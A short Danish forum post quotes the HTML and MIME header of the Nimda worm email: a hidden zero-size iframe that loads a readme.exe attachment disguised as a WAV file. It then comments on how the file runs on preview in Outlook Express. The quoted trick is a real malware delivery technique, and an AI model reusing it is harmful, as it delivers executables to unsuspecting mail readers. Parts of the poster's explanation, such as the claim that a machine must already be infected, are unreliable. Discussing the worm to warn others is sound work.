headeren fra Nimda
HejsaHer er så html sektionheaderen fra Nimda:
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name=\"readme.exe\"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Så vidt jeg kan se tager den en fil fra systemet
(man skal altså FØRST være smittet)
og denne fil afvikles så igennem Iframe upload
Dette kan ikke ske hvis active-scriptning er slået FRA!
-og man naturligvis svarer NEJ til at active-x komponenten må køre!
Det ER altså en javaSCRIPT komponent (iframe) som forsøger at aktivere en active-x-komponent (ID....)
OBS at outlook-express aktiverer filen blot ved preview!!
Det er det absolut mest truende!
mvh. a.
